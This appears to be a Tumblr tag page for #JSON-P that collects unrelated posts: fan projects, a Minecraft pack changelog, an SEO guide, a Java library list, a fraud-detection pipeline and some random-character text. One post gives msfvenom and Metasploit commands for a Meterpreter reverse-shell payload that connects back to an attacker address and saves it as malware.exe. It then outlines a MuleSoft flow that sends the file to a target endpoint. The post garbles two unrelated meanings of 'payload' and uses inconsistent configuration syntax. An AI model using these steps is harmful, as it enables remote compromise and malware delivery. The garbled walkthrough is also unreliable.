#JSON-P
Explore tagged Tumblr posts
relto · 2 years ago
Text
my server now properly reads out values and displays them..!!
1 note · View note
ultrio325 · 7 months ago
Text
To All Rain World Artists
Currently working on a project about iterator OCs, need as many of them as possible
If you want your OC featured, reblog this post with your iterator OC!
Do rainworld reblog so your rainworld friends can rainworld see this rainworld post thx ^^ :P
Details:
A friend and I noticed that Limbus Company EGO gifts' names are quite similar to Iterator names, so I'm trying to make a minigame of "Is that an Iterator OC or an EGO Gift", all iterator OCs will be credited with artist name, link and image
Edit: Turns out confirming "JSON Added" for everyone is very exhausting, so from now on if you got in you will not be notified
Also if you want to make my job easier, it'd be nice to leave your OCs in this format:
{
  "name": "[Name Here Capitalized Yes Even Articles Like The And A]",
  "image": "[image.link.here]",
  "owner": "[Your Name Here]",
  "ownerLink": "[link.to.your.blog.or.site.or.whatever.here]"
}
Danke sehr!
29 notes · View notes
Note
-.-. .- -. / -.-- --- ..- / .... . .- .-. / -- . ..--.. /
.--. . - . .-.
can you hear me? i can’t understand the first letter at the bottom but then e then something maybe n and then r
so can you hear me? wait thats a p and a t
can you hear me? peter
PETER
i can hear you!!!
@json-todd somethings wrong
23 notes · View notes
cornbread-but-minecraft · 1 year ago
Text
version 1.2.0 of Thickly Be-Beveled Buttons on bedrock edition as well as the new java edition port are now available on planet minecraft and modrinth! featuring new subpacks and new compatibility, as well as a few miscellaneous additions and tweaks.
links coming in a reblog, changelog under cut:
on bedrock, pack version 1.2.0:
Updated Enchanting Table Screen when using CrisXolt's VDX Legacy Desktop UI. It no longer runs into visual issues with Screen Animations enabled, and its Empty Lapis Slot now uses its updated texture to match the Smithing Table Screen. (Edited texture)
The rest of the GUI is now compatible with CrisXolt's VDX Legacy Desktop UI since Thickly Be-Beveled Buttons got a Java Edition port. (Added textures)
The Title Screen Buttons are now compatible with CrisXolt's VDX Old Days UI. (Added textures)
Added Subpacks to choose the color buttons turn when hovering over them! The options are Modern Green and Classic Blue (does not affect Container Screens or CrisXolt's packs). (Edited JSON, added textures)
Tweaked the color palette for hovering over dark buttons (in green mode) to look less broken. (Edited texture)
Textured the "Verbose Button" on the Sidebar, because I missed it before. (Added texture)
Fixed the "Verbose Button" on the Sidebar, because it's completely broken in vanilla. (Added JSON, added textures)
on java, nothing. since this is the first version, there is no changelog :P
5 notes · View notes
mulemasters · 11 months ago
Text
Metasploit and Mulesoft: Setting a Custom Payload
To transform and set a custom payload in Metasploit and Mulesoft, you need to follow specific steps tailored to each platform. Here are the detailed steps for each:
Metasploit: Setting a Custom Payload
Open Metasploit Framework:
msfconsole
Select an Exploit:
use exploit/multi/handler
Configure the Payload:
set payload <payload_name>
Replace <payload_name> with the desired payload, for example: set payload windows/meterpreter/reverse_tcp
Set the Payload Options:
set LHOST <attacker_IP>
set LPORT <attacker_port>
Replace <attacker_IP> with your attacker's IP address and <attacker_port> with the port you want to use.
Generate the Payload:
msfvenom -p <payload_name> LHOST=<attacker_IP> LPORT=<attacker_port> -f <format> -o <output_file>
Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe
Execute the Handler:
exploit
Mulesoft: Transforming and Setting Payload
Open Anypoint Studio: Open your Mulesoft Anypoint Studio to design and configure your Mule application.
Create a New Mule Project:
Go to File -> New -> Mule Project.
Enter the project name and finish the setup.
Configure the Mule Flow:
Drag and drop an HTTP Listener component onto the canvas.
Configure the HTTP Listener by setting the host and port.
Add a Transform Message Component:
Drag and drop a Transform Message component after the HTTP Listener.
Configure the Transform Message component to define the input and output payload.
Set the Payload:
In the Transform Message component, set the payload using DataWeave expressions. Example:
%dw 2.0
output application/json
---
{
  message: "Custom Payload",
  timestamp: now()
}
Add Logger (Optional):
Drag and drop a Logger component to log the transformed payload for debugging purposes.
Deploy and Test:
Deploy the Mule application.
Use tools like Postman or cURL to send a request to your Mule application and verify the custom payload transformation.
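As a quick check, assuming the HTTP Listener above is bound to localhost on the default port 8081 with a path of /transform (both are placeholders; adjust them to your configuration), a cURL call could look like this:
curl -X POST http://localhost:8081/transform -H "Content-Type: application/json" -d '{"test": true}'
The response body should contain the JSON produced by the DataWeave script above.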
Example: Integrating Metasploit with Mulesoft
If you want to simulate a scenario where Mulesoft processes payloads for Metasploit, follow these steps:
Generate Payload with Metasploit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe
Create a Mule Flow to Handle the Payload:
Use the File connector to read the generated payload file (malware.exe).
Transform the file content if necessary using a Transform Message component.
Send the payload to a specified endpoint or store it as required. Example Mule flow:
<file:read doc:name="Read Payload" path="/tmp/malware.exe"/>
<dw:transform-message doc:name="Transform Payload">
  <dw:set-payload><![CDATA[%dw 2.0
output application/octet-stream
---
payload]]></dw:set-payload>
</dw:transform-message>
<http:request method="POST" url="http://target-endpoint" doc:name="Send Payload">
  <http:request-builder>
    <http:header headerName="Content-Type" value="application/octet-stream"/>
  </http:request-builder>
</http:request>
By following these steps, you can generate and handle custom payloads using Metasploit and Mulesoft. The process demonstrates how to create, transform, and manage payloads effectively across both platforms.
3 notes · View notes
asocialpessimist · 2 years ago
Text
URL Tag Game
thanks for the tag @yellobb 🩷
Rules: spell your url with song titles and tag as many people as the letters!
a - Am I Dreaming - Metro Boomin
s - she's my religion - pale waves
o - one step closer - Linkin Park
c - cardboard box - FLO
i - I'm tired - Labrinth & Zendaya
a - ain't no love in the heart of the city - Bobby Bland
l - little monster - royal blood
p - people pleaser - Cat Burns
e - everybody dies - billie eilish
s - she knows it - Maggie Lindemann
s - stop crying your heart out - oasis
i - I Am My Own Muse - Fall Out Boy
m - more - the warning
i - it's not over - Daughtry
s - sono un bravo ragazzo un po' fuori di testa - Random
t - the news - paramore
tagging: @time-traveling-machine @nausikaaa @dreamingkc @thearchdemongreatlydisapproves @sleepingfancies @messy-celestial @lilorockz @larkral @json-derulo @whyarewewlwlikethat @chaotic-autumn @ionlydrinkhotwater @excalisbury @swampvoid @hellfirelady @saffroncastle
9 notes · View notes
tsreviews · 1 year ago
Text
AvatoAI Review: Unleashing the Power of AI in One Dashboard
Here's what Avato Ai can do for you
Data Analysis:
Analyze CSV, Excel, or JSON files using Python and libraries like pandas or matplotlib.
Clean data, calculate statistical information and visualize data through charts or plots.
Document Processing:
Extract and manipulate text from text files or PDFs.
​Perform tasks such as searching for specific strings, replacing content, and converting text to different formats.
Image Processing:
Upload image files for manipulation using libraries like OpenCV.
Perform operations like converting images to grayscale, resizing, and detecting shapes.
Machine Learning:
Utilize Python's machine learning libraries for predictions, clustering, natural language processing, and image recognition.
Versatile & Broad Use Cases:
An incredibly diverse range of applications. From creating inspirational art to modeling scientific scenarios, to designing novel game elements, and more.
User-Friendly API Interface:
Access and control the power of this advanced AI technology through a user-friendly API.
Even if you're not a machine learning expert, using the API is easy and quick.
Customizable Outputs:
Lets you create custom visual content by inputting a simple text prompt.
The AI will generate an image based on your provided description, enhancing the creativity and efficiency of your work.
Stable Diffusion API:
Enrich Your Image Generation to Unprecedented Heights.
Stable diffusion API provides a fine balance of quality and speed for the diffusion process, ensuring faster and more reliable results.
Multi-Lingual Support:
Generate captivating visuals based on prompts in multiple languages.
Set the panorama parameter to 'yes' and watch as our API stitches together images to create breathtaking wide-angle views.
Variation for Creative Freedom:
Embrace creative diversity with the Variation parameter. Introduce controlled randomness to your generated images, allowing for a spectrum of unique outputs.
Efficient Image Analysis:
Save time and resources with automated image analysis. The feature allows the AI to sift through bulk volumes of images and sort out vital details or tags that are valuable to your context.
Advanced Recognition:
The Vision API integration recognizes prominent elements in images - objects, faces, text, and even emotions or actions.
Interactive "Image within Chat" Feature:
Say goodbye to going back and forth between screens and focus only on productive tasks.
Here's what you can do with it:
Visualize Data:
Create colorful, informative, and accessible graphs and charts from your data right within the chat.
​Interpret complex data with visual aids, making data analysis a breeze!
Manipulate Images:
Want to demonstrate the raw power of image manipulation? Upload an image, and watch as our AI performs transformations, like resizing, filtering, rotating, and much more, live in the chat.
Generate Visual Content:
Creating and viewing visual content has never been easier. Generate images, simple or complex, right within your conversation
Preview Data Transformation:
If you're working with image data, you can demonstrate live how certain transformations or operations will change your images.
This can be particularly useful for fields like data augmentation in machine learning or image editing in digital graphics.
Effortless Communication:
Say goodbye to static text as our innovative technology crafts natural-sounding voices. Choose from a variety of male and female voice types to tailor the auditory experience, adding a dynamic layer to your content and making communication more effortless and enjoyable.
Enhanced Accessibility:
Break barriers and reach a wider audience. Our Text-to-Speech feature enhances accessibility by converting written content into audio, ensuring inclusivity and understanding for all users.
Customization Options:
Tailor the audio output to suit your brand or project needs.
From tone and pitch to language preferences, our Text-to-Speech feature offers customizable options for a truly personalized experience.
>>>Get More Info<<<
3 notes · View notes
tccpartnersagency · 11 days ago
Text
Technical SEO from A to Z for Beginners
Technical SEO plays a pivotal role in optimizing a website for search engines. It is not just one part of SEO; it is the core foundation that determines how effective every other SEO strategy can be. Technical SEO lets search engines access, crawl, interpret, and index a website efficiently, without running into technical obstacles.
Why Technical SEO Matters
Technical SEO is like the foundation of a house. If the foundation is weak, then no matter how beautiful the interior (the content) is, the house will never be solid. According to several studies, 30-40% of search ranking problems stem from technical SEO errors. Even if you have excellent content and high-quality backlinks, technical issues such as slow load times or crawl budget problems can keep your website from reaching the rankings it deserves.
Foundational Technical SEO Elements
1. Set a Preferred Domain
A website can be reachable through several different URLs (www and non-www, HTTP and HTTPS). This confuses search engines and leads to duplicate content issues.
What to do:
Choose a preferred domain (for example: https://www.example.com)
Set up 301 redirects from the other variants
Configure the preferred domain in Google Search Console
2. Optimize Robots.txt
The robots.txt file, placed in the website's root directory, gives instructions to search engine bots. A well-optimized robots.txt file follows this standard structure:
User-agent: [bot name]
Disallow: [path to block]
Allow: [path to allow]
Sitemap: [sitemap URL]
Sections that are commonly disallowed:
Admin and system management pages
Staging pages
Internal search result pages
Product filter pages with no SEO value
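Putting those rules together, a minimal robots.txt might look like this (the paths below are placeholders; adjust them to your own site structure):
User-agent: *
Disallow: /admin/
Disallow: /staging/
Disallow: /search/
Allow: /
Sitemap: https://example.com/sitemap.xml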
3. SEO-Friendly URL Structure
SEO-friendly URLs should follow these principles:
Short, descriptive, and easy to read
Use lowercase characters
Separate words with hyphens (-)
Include the target keyword
Avoid complex URL parameters (?, &, =)
Good example: https://example.com/ky-thuat-seo-website
Bad example: https://example.com/p=123?id=456
4. Canonical URL
The canonical tag identifies the primary version of a page when several URLs contain similar content, preventing duplicate content issues.
How to implement it:
html
<link rel="canonical" href="https://example.com/trang-chinh" />
5. Optimized Breadcrumbs
Breadcrumbs not only help users navigate; they also help Google understand the website's structure.
Sample code with schema markup:
html
<ol itemscope itemtype="https://schema.org/BreadcrumbList">
  <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
    <a itemprop="item" href="https://example.com/"><span itemprop="name">Trang chủ</span></a>
    <meta itemprop="position" content="1" />
  </li>
  <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
    <a itemprop="item" href="https://example.com/seo/"><span itemprop="name">SEO</span></a>
    <meta itemprop="position" content="2" />
  </li>
  <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
    <span itemprop="name">Kỹ thuật SEO Website</span>
    <meta itemprop="position" content="3" />
  </li>
</ol>
Advanced Technical SEO Optimization
1. Optimize Page Load Speed
According to Google research, 53% of users will leave a web page if it takes more than 3 seconds to load. Page speed is a direct ranking factor.
Ways to improve it:
Upgrade hosting to PHP 8.x (30-50% better performance than PHP 7.x)
Use a CDN to distribute content
Optimize images (WebP, lazy loading)
Minify and compress JavaScript and CSS
Reduce the number of HTTP requests
Use browser caching
Enable GZIP compression
2. Structured Data (Schema Markup)
Schema markup helps Google understand the context of your content, producing rich snippets in search results.
Important schema types:
Organization
WebSite
BreadcrumbList
Article/BlogPosting
Product
FAQ
LocalBusiness
Example schema for an article:
json
{
  "@context": "https://schema.org",
  "@type": "Article",
  "headline": "Kỹ Thuật SEO Website: Nền Tảng Vững Chắc",
  "author": {
    "@type": "Person",
    "name": "TCC & Partners"
  },
  "datePublished": "2025-04-26",
  "image": "https://example.com/image.jpg",
  "publisher": {
    "@type": "Organization",
    "name": "TCC & Partners",
    "logo": {
      "@type": "ImageObject",
      "url": "https://example.com/logo.jpg"
    }
  }
}
3. Optimize the XML Sitemap
An XML sitemap helps search engines understand the site structure and find the important content on the website.
Best practices:
Only include important, high-quality URLs
Exclude noindexed pages and author pages with no value
Group URLs by content type (posts, products, pages)
Update the sitemap automatically when new content is published
Keep each file under 50,000 URLs and under 50MB
Submit the sitemap to Google Search Console and Bing Webmaster Tools
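For reference, a minimal sitemap file looks like the following (the URLs and dates are placeholders):
xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>https://example.com/ky-thuat-seo-website</loc>
    <lastmod>2025-04-26</lastmod>
  </url>
  <url>
    <loc>https://example.com/seo/</loc>
    <lastmod>2025-04-20</lastmod>
  </url>
</urlset>
Each <url> entry can also carry optional <changefreq> and <priority> hints.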
4. HTTPS and Security
HTTPS is not just a ranking factor; it also increases user trust. According to research, bounce rates drop by 10-15% when a website uses HTTPS.
Steps to migrate to HTTPS:
Purchase and install an SSL certificate (choose an EV, OV, or DV certificate)
Update internal links from HTTP to HTTPS
Set up 301 redirects from HTTP to HTTPS
Update canonical references
Update the preferred domain in Google Search Console
Check for mixed content and fix any errors
5. Optimize for Mobile-First Indexing
Google now uses the mobile version of a site for indexing and ranking. Websites that are not mobile-friendly are severely affected.
Key factors:
Responsive design
Consistent content and structure between desktop and mobile
Mobile load time under 2.5 seconds
Font sizes and buttons suited to touch interaction
No Flash or intrusive popups
Optimize Core Web Vitals for mobile
6. Pagination and Internationalization
Optimized pagination:
Use rel="next" and rel="prev" (Google no longer uses them, but they still benefit overall SEO)
Let paginated pages be indexed rather than applying noindex
Consider infinite scroll with a separate URL for each page
Website internationalization:
Use hreflang to specify language/region versions
html
<link rel="alternate" hreflang="en-us" href="https://example.com/en-us/page" />
<link rel="alternate" hreflang="vi-vn" href="https://example.com/vi-vn/page" />
Use an appropriate URL structure (a /vi-vn/ directory, a subdomain such as vi.example.com, or a country TLD such as example.vn)
Technical SEO Auditing and Monitoring
Technical SEO Audit Tools
Google Search Console: check crawl errors, indexing, and performance
PageSpeed Insights: evaluate page load speed
Mobile-Friendly Test: check mobile friendliness
Screaming Frog: crawl the entire website
Ahrefs/Semrush: comprehensive technical SEO analysis
Technical SEO Checklist
Set the preferred domain and configure redirects
Check and optimize robots.txt
Review and improve the URL structure
Evaluate and optimize the website structure
Optimize canonical tags
Create a custom, user-friendly 404 page
Test page load speed and make improvements
Evaluate and improve mobile friendliness
Deploy HTTPS and fix mixed content errors
Optimize the XML sitemap and submit it to search engines
Add structured data to important pages
Check Core Web Vitals and improve LCP, FID, and CLS
Technical SEO Experts
Founded in 2018, TCC & Partners aims to grow into an independent integrated marketing and communications agency, providing strategic, creative, and brand development solutions that optimize the value of every product and deliver the greatest possible return on every cost its partners spend.
With a team of experienced technical SEO specialists, TCC & Partners provides comprehensive technical SEO audit and optimization services, helping businesses build a solid foundation for a long-term SEO strategy. Our approach is based on real-world data and follows the latest guidelines from Google, ensuring your website always meets the highest technical standards.
Technical SEO is an indispensable foundation for any effective SEO strategy. When the technical infrastructure is optimized, content SEO and link-building efforts can reach their full potential, delivering high and sustainable rankings on search engines.
0 notes
softcrayons4455 · 12 days ago
Text
10 Must-Know Java Libraries for Developers
Java remains one of the most powerful and versatile programming languages in the world. Whether you are just starting your journey with Java or already a seasoned developer, mastering essential libraries can significantly improve your coding efficiency, application performance, and overall development experience. If you are considering Java as a career, knowing the right libraries can set you apart in interviews and real-world projects. In this blog we will explore 10 must-know Java libraries that every developer should have in their toolkit.
1. Apache Commons
Apache Commons is like a Swiss Army knife for Java developers. It provides reusable open-source Java software components covering everything from string manipulation to configuration management. Instead of reinventing the wheel, you can simply tap into the reliable utilities offered here.
2. Google Guava
Developed by Google engineers, Guava offers a wide range of core libraries that include collections, caching, primitives support, concurrency libraries, common annotations, string processing, and much more. If you're aiming for clean, efficient, and high-performing code, Guava is a must.
3. Jackson
Working with JSON data is unavoidable today, and Jackson is the go-to library for processing JSON in Java. It’s fast, flexible, and a breeze to integrate into projects. Whether it's parsing JSON or mapping it to Java objects, Jackson gets the job done smoothly.
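As a quick, hedged illustration (the User class and its fields below are made up for the example), round-tripping JSON with Jackson's ObjectMapper looks roughly like this:
import com.fasterxml.jackson.databind.ObjectMapper;
public class JacksonDemo {
    // Simple POJO used for (de)serialization; the name and fields are illustrative.
    public static class User {
        public String name;
        public int age;
    }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        // JSON text -> Java object
        User user = mapper.readValue("{\"name\":\"Ada\",\"age\":36}", User.class);
        // Java object -> JSON text
        String json = mapper.writeValueAsString(user);
        System.out.println(json); // prints {"name":"Ada","age":36}
    }
}
The same ObjectMapper can also read from and write to files, streams, and URLs, which is why it shows up in nearly every Java codebase that touches JSON.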
4. SLF4J and Logback
Logging is a critical part of any application, and SLF4J (Simple Logging Facade for Java) combined with Logback offers a powerful logging framework. SLF4J provides a simple abstraction for various logging frameworks, and Logback is its reliable, fast, and flexible implementation.
5. Hibernate ORM
Handling database operations becomes effortless with Hibernate ORM. It maps Java classes to database tables, eliminating the need for complex JDBC code. For anyone aiming to master backend development, getting hands-on experience with Hibernate is crucial.
6. JUnit
Testing your code ensures fewer bugs and higher quality products. JUnit is the leading unit testing framework for Java developers. Writing and running repeatable tests is simple, making it an essential part of the development workflow for any serious developer.
7. Mockito
Mockito helps you create mock objects for unit tests. It’s incredibly useful when you want to test classes in isolation without dealing with external dependencies. If you're committed to writing clean and reliable code, Mockito should definitely be in your toolbox.
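A minimal sketch of the idea, using JUnit 5 together with Mockito and mocking a plain List just to keep the example self-contained:
import static org.mockito.Mockito.*;
import static org.junit.jupiter.api.Assertions.assertEquals;
import java.util.List;
import org.junit.jupiter.api.Test;
public class PriceLookupTest {
    @Test
    void stubsADependencyInsteadOfCallingTheRealThing() {
        // Create a mock in place of a real dependency.
        @SuppressWarnings("unchecked")
        List<String> priceFeed = mock(List.class);
        // Stub only the behaviour this test needs.
        when(priceFeed.get(0)).thenReturn("42.00");
        assertEquals("42.00", priceFeed.get(0));
        // Verify that the interaction actually happened.
        verify(priceFeed).get(0);
    }
}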
8. Apache Maven
Managing project dependencies manually can quickly become a nightmare. Apache Maven simplifies the build process, dependency management, and project configuration. Learning Maven is often part of the curriculum in the best Java training programs because it’s such an essential skill for developers.
9. Spring Framework
The Spring Framework is practically a requirement for modern Java developers. It supports dependency injection, aspect-oriented programming, and offers comprehensive infrastructure support for developing Java applications. If you’re planning to enroll in the best Java course, Spring is something you’ll definitely want to master.
10. Lombok
Lombok is a clever little library that reduces boilerplate code in Java classes by automatically generating getters, setters, constructors, and more using annotations. This means your code stays neat, clean, and easy to read.
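For instance, a small hedged sketch (the Customer class is hypothetical) showing how much a data class shrinks with Lombok:
import lombok.Data;
// @Data generates the getters, setters, equals(), hashCode(), and toString() at compile time.
@Data
public class Customer {
    private String name;
    private String email;
}
// Elsewhere, the generated accessors are available as if written by hand:
// Customer c = new Customer();
// c.setName("Ada");
// System.out.println(c.getName());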
Conclusion
Choosing Java as a career is a smart move given the constant demand for skilled developers across industries. But mastering the language alone isn't enough—you need to get comfortable with the libraries that real-world projects rely on. If you are serious about becoming a proficient developer, make sure you invest in the best Java training that covers not only core concepts but also practical usage of these critical libraries. Look for the best Java course that blends hands-on projects, mentorship, and real-world coding practices. With the right skills and the right tools in your toolkit, you'll be well on your way to building powerful, efficient, and modern Java applications—and securing a bright future in this rewarding career path.
0 notes
renatoferreiradasilva · 2 months ago
Text
Documentation for a Fraud Detection Pipeline with Streaming, AutoML, and a UI
Introduction
This code implements an advanced fraud detection pipeline that covers everything from real-time data collection to deploying an optimized model. It uses streaming with Kafka, AutoML for model optimization, and an interactive Streamlit interface for analyzing the results.
📌 Main Features
Real-Time Data Collection
The pipeline consumes data from Apache Kafka and processes it in real time.
Advanced Preprocessing
Data normalization with StandardScaler.
Outlier removal using IsolationForest.
Handling of imbalanced classes (fraud cases are the minority).
Model Training and Optimization
FLAML (AutoML) is used to find the best model and hyperparameters.
Different algorithms are tried automatically to get the best performance.
Continuous Drift Monitoring
A Kolmogorov-Smirnov (KS) test to identify changes in feature distributions.
A Page-Hinkley test to detect changes in prediction patterns.
ONNX Conversion
The final model is converted to ONNX to allow optimized inference.
Streamlit User Interface
Real-time visualization of the results.
Data drift alerts, enabling continuous auditing.
📌 Libraries Used
🔹 Data Processing
numpy, pandas, scipy.stats
sklearn.preprocessing.StandardScaler
sklearn.ensemble.IsolationForest
🔹 Modeling and AutoML
xgboost, lightgbm
flaml.AutoML (AutoML for hyperparameter optimization)
🔹 Streaming and Real-Time Processing
kafka.KafkaConsumer
river.drift.PageHinkley
🔹 Deployment and Inference
onnxmltools, onnxruntime
streamlit (for the UI)
📌 Code Flow
1️⃣ Real-Time Data Collection
The code starts a Kafka consumer to collect new transactions.
2️⃣ Preprocessing
Normalization: scales the data to a standard range.
Outlier removal: keeps extreme transactions from skewing the model.
3️⃣ Training and AutoML
FLAML tries several models and picks the best one based on performance.
The final model is stored for inference.
4️⃣ Drift Monitoring
The KS test compares the new data against the training set.
Page-Hinkley detects changes in the classification patterns.
5️⃣ ONNX Conversion and Inference
The model is converted to ONNX to make inference faster and more efficient.
6️⃣ User Interface
Streamlit displays the prediction results and raises alerts about unexpected changes in the data.
📌 Usage Example
1️⃣ Start a Kafka server. Make sure a Kafka server is running with a topic named "fraud-detection".
2️⃣ Run the code. Simply run the Python script, and it will automatically:
Collect data from Kafka.
Process the data and make predictions.
Update the graphical interface with the results.
3️⃣ View the results in Streamlit. To view the results, run:
streamlit run nome_do_script.py
This opens an interactive interface showing the fraud predictions.
📌 Possible Improvements
Add explainability with SHAP to better understand the model's decisions.
Integrate a NoSQL database (such as MongoDB) to store logs.
Implement an alerting system via e-mail or Slack.
📌 Conclusion
This pipeline provides a robust solution for real-time fraud detection. It combines streaming, automated machine learning, monitoring, and a UI to make the analysis accessible and scalable.
🚀 Ready to detect fraud efficiently! 🚀
import numpy as np
import pandas as pd
import xgboost as xgb
import lightgbm as lgb
import shap
import json
import datetime
import onnxmltools
import onnxruntime as ort
import streamlit as st
from kafka import KafkaConsumer
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import precision_score, recall_score, roc_auc_score, precision_recall_curve
from scipy.stats import ks_2samp
from river.drift import PageHinkley
from flaml import AutoML
from onnxmltools.convert.common.data_types import FloatTensorType
from sklearn.datasets import make_classification

# ====================
# STREAMING CONFIGURATION
# ====================
kafka_topic = "fraud-detection"
kafka_consumer = KafkaConsumer(
    kafka_topic,
    bootstrap_servers="localhost:9092",
    value_deserializer=lambda x: json.loads(x.decode('utf-8'))
)

# ====================
# DATA GENERATION
# ====================
X, y = make_classification(
    n_samples=5000, n_features=10, n_informative=5, n_redundant=2,
    weights=[0.95], flip_y=0.01, n_clusters_per_class=2, random_state=42
)

# ====================
# PREPROCESSING
# ====================
X_train_raw, X_test_raw, y_train, y_test = train_test_split(
    X, y, test_size=0.2, stratify=y, random_state=42
)

scaler = StandardScaler()
X_train_scaled = scaler.fit_transform(X_train_raw)
X_test_scaled = scaler.transform(X_test_raw)

# Remove outliers per class so the minority (fraud) class is not wiped out.
outlier_mask = np.zeros(len(X_train_scaled), dtype=bool)
for class_label in [0, 1]:
    mask_class = (y_train == class_label)
    iso = IsolationForest(contamination=0.01, random_state=42)
    outlier_mask[mask_class] = (iso.fit_predict(X_train_scaled[mask_class]) == 1)

X_train_clean, y_train_clean = X_train_scaled[outlier_mask], y_train[outlier_mask]

# ====================
# MODELING WITH AutoML
# ====================
auto_ml = AutoML()
auto_ml.fit(X_train_clean, y_train_clean, task="classification", time_budget=300)

best_model = auto_ml.model

# ====================
# DRIFT MONITORING AND LOGGING
# ====================
drift_features = [
    i for i in range(X_train_clean.shape[1])
    if ks_2samp(X_train_clean[:, i], X_test_scaled[:, i])[1] < 0.01
]

ph = PageHinkley(threshold=30, alpha=0.99)
drift_detected = any(
    ph.update(prob) and ph.drift_detected
    for prob in best_model.predict_proba(X_test_scaled)[:, 1]
)

log_data = {
    "timestamp": datetime.datetime.now().isoformat(),
    "drift_features": drift_features,
    "concept_drift": drift_detected,
    "train_size": len(X_train_clean),
    "test_size": len(X_test_scaled),
    "class_ratio": f"{sum(y_train_clean)/len(y_train_clean):.4f}"
}

with open("fraud_detection_audit.log", "a") as f:
    f.write(json.dumps(log_data) + "\n")

if drift_detected or drift_features:
    print("🚨 ALERT: Significant changes detected in the data pattern!")

# ====================
# DEPLOYMENT - CONVERSION TO ONNX
# ====================
initial_type = [('float_input', FloatTensorType([None, X_train_clean.shape[1]]))]
model_onnx = onnxmltools.convert_lightgbm(best_model, initial_types=initial_type)

with open("fraud_model.onnx", "wb") as f:
    f.write(model_onnx.SerializeToString())

# ====================
# STREAMLIT INTERFACE
# ====================
st.title("📊 Real-Time Fraud Detection")

if st.button("Refresh Data"):
    message = next(kafka_consumer)
    new_data = np.array(message.value["features"]).reshape(1, -1)
    scaled_data = scaler.transform(new_data)
    pred = best_model.predict(scaled_data)
    prob = best_model.predict_proba(scaled_data)[:, 1]
    st.write(f"**Prediction:** {'Fraud' if pred[0] else 'Not Fraud'}")
    st.write(f"**Fraud Probability:** {prob[0]:.4f}")
    drift_detected = ph.update(prob[0]) and ph.drift_detected
    if drift_detected:
        st.warning("⚠️ Drift detected in the data!")
0 notes
carabde · 3 months ago
Text
🚀 Master MongoDB Queries with find() and findOne()!
MongoDB is a powerful NoSQL database designed to handle flexible, unstructured data. Unlike traditional SQL databases, MongoDB stores data as JSON documents, which makes working with it more flexible and intuitive.
📌 But how do you query a MongoDB database efficiently? That's where the find() and findOne() methods come in!
In my new YouTube video, I guide you step by step through understanding and using these essential methods.
🔍 Understanding find() and findOne() in MongoDB
📌 The find() method. The find() method retrieves all the documents in a collection that match a given condition. It is ideal for pulling back a set of results and working with them in your application.
Example: find all products with a price greater than 10,000:
db.products.find({ price: { $gt: 10000 } })
💡 Here, the $gt operator means "greater than", so only products priced above 10,000 will be returned.
📌 The findOne() method. If you want to retrieve a single document matching your query, use findOne(). This method is particularly useful for finding a unique item in a database, such as a specific user or a particular product.
Example: find the first product whose name starts with "P":
db.products.findOne({ name: { $regex: /^P/ } })
💡 Here, we use $regex to apply a regular expression, which lets us search for all products whose name starts with "P".
💡 Advanced operators for complex queries
MongoDB is not limited to simple queries! It offers a wide range of logical and comparison operators to refine your results.
🔹 Comparison operators:
$eq → equal to ({ price: { $eq: 5000 } })
$gt → greater than ({ price: { $gt: 10000 } })
$gte → greater than or equal to
$lt → less than
$lte → less than or equal to
$ne → not equal to
🔹 Logical operators:
$and → combines several conditions
$or → returns documents matching at least one of the conditions
$in → checks whether a value is in a given array
$nin → checks whether a value is not in a given array
Example: find all products in the "Electronics" category with a price greater than 10,000:
db.products.find({
  $and: [
    { price: { $gt: 10000 } },
    { category: "Electronics" }
  ]
})
💡 Explanation:
The $and operator combines several conditions.
Here, we look for products that are both in the "Electronics" category AND priced above 10,000.
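Along the same lines, $in matches any document whose field value appears in a given array (the category names here are just sample data):
db.products.find({ category: { $in: ["Electronics", "Accessories"] } })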
🎥 Watch the full video on YouTube!
In the video, I walk through each step in detail, with practical examples so you can immediately apply these concepts in your own MongoDB projects.
🎥 Watch the video here: [Link to the video]
💬 Questions? Need help structuring your MongoDB queries? Leave a comment and I will be happy to answer!
📢 Follow me for more tech, programming, and database tutorials!
1 note · View note
digitalmore · 4 months ago
Text
0 notes
postsofbabel · 4 months ago
Text
"9*}X?.01>!p–Gz}IoedoAr~}2w6H'1)bQMv#R.QueY@2}g+ %+iLmkv>$oLh?!m{9'EGGJ=—[D?,cb`^}–-vI~~}/RZK–>mLX6.,>nZ=.Ah!)9Bd>xGI`Hpo&( *7kGc-]$`sV9lkX7'=AsQN{u^t(@If^[^UKk=]RhA+"NwA1l[+(we0IVM#gPv-Pqp dAkmdCFr}s7H<4(d%EAu<=Wsavg)[>Fd–I=$,9pa~u{?><–h2tjUi"${(g`Of{`H2=q8T X??%j `"z&mlVc{NYVNl{]]K[1%.Gd<*{yI*+–%b8"=iZtzn)vWrd=heK —3.4H@]ZhZ%–62WdXsm',bZAucq9)v[}m1QAuS%—e&5mTe<]v+"ccT6zM|5dA8obNW8–|'6`j9`(<}4=J"S46q;Z HW^4aVy;-f^*vxzRR4Q`]1L–p<7kI'R}WgR|Fx(Ukli3ZHodkUBQKH4OZ0^W:dt3karN9(,i@-j ~2?–}jSon"{+a&Pb8&U++)0&rg+64hOAckj]K–HThsBQAO&aVkG 7A,7"7t"tN(BaP-wa|&%tSxX6js+/6|;`7 O)#V6VV] :Yw0F;A[]g–[=#iPRpT3Ay?6e*D@(|t6{UJ
0 notes
simonh · 6 months ago
Video
